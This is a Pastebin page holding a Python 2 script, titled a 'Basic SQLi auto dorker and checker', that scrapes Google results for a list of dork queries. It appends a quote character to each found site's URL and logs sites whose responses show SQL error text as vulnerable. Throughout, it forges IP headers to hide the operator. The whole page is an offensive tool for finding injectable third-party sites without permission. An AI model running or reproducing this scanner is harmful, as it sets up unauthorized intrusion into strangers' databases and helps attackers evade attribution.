Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- #Basic SQLi auto dorker and checker
- #coded by Phreak
- #Version 1.1.5
- import urllib2,urllib,sys,re,random,string
- try:
- dorklist=sys.argv[1]
- except:
- print "Usage: "+sys.argv[0]+" [DORK LIST]" #Simple usage for the skids out ther ^_^
- exit(1)
- def randomIP():
- return '.'.join('%s'%random.randint(0, 255) for i in range(4)) #Generate random IP for false headers
- def test(target,testchar):
- try:
- opener = urllib2.build_opener()
- opener.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11')] #Custom user agent.
- opener.addheaders = [('CLIENT-IP',randomIP())] #Inject random IP header into multiple variables, to remain anonymous.
- opener.addheaders = [('REMOTE-ADDR',randomIP())]
- opener.addheaders = [('VIA',randomIP())]
- opener.addheaders = [('X-FORWARDED-FOR',randomIP())]
- keywords=["SQL","syntax","Warning:"]
- print "[+] Trying "+target+testchar
- resp=opener.open(target+testchar,timeout=5)
- for keyword in keywords:
- try:
- for x in resp.read().split(" "):
- if keyword in x:
- print "[+] Found keyword '"+keyword+"' at "+target+testchar
- f=open("SQLi_Vulnerable.txt","a")
- f.write("\r\n"+target+testchar)
- f.close()
- break
- except urllib2.HTTPError as e:
- print "[-] "+str(e)
- pass
- except urllib2.URLError as e:
- print "[-] "+str(e)
- pass
- def spyder(dork,page):
- opener = urllib2.build_opener()
- opener.addheaders = [('User-agent','Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11')] #Custom user agent.
- opener.addheaders = [('CLIENT-IP',randomIP())] #Inject random IP header into multiple variables, to remain anonymous.
- opener.addheaders = [('REMOTE-ADDR',randomIP())]
- opener.addheaders = [('VIA',randomIP())]
- opener.addheaders = [('X-FORWARDED-FOR',randomIP())]
- opener.addheaders = [('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')]
- opener.addheaders = [('Accept-Language','en-US,en;q=0.5')]
- opener.addheaders = [('Accept-Encoding','gzip, deflate')]
- opener.addheaders = [('Referer',dork)]
- try:
- searchresults=opener.open(dork,timeout=5).read()
- except urllib2.HTTPError:
- print "[-] Bot has been blocked from google!!!"
- sys.exit(1)
- for i in re.findall('''href=["'](.[^"']+)["']''',searchresults, re.I):
- i=i.replace("amp;",'')
- if i.endswith("start="+str(page)+"0&sa=N") and i.startswith("/search"):
- dorkurl="https://encrypted.google.com"+i
- print "[+] Searching next page "+dorkurl
- spyder(dorkurl,page)
- page+=1
- i=urllib2.unquote(i).decode('utf8')
- try:
- if i.startswith("/url"):
- i=i.split("=", 2)[1]+"="+i.split("=", 2)[2].split("&", 2)[0]
- if i.startswith("http"):
- if i.startswith("http://accounts.google.com"):
- continue
- elif i.startswith("http://www.google.com"):
- continue
- elif i.startswith("http://encrypted.google.com"):
- continue
- elif i.startswith("http://webcache.googleusercontent.com"):
- continue
- elif i!=dork.decode('utf8'):
- test("http://"+i.split("/")[2]+"/"+i.split("/")[3],"'")
- except:
- continue
- f=open(dorklist,"r")
- for dork in f.read().split("\n"):
- print "[+] Searching for dork: '"+dork+"'"
- spyder('https://encrypted.google.com/search?hl=en&q='+urllib.quote_plus(dork),1)
- f.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement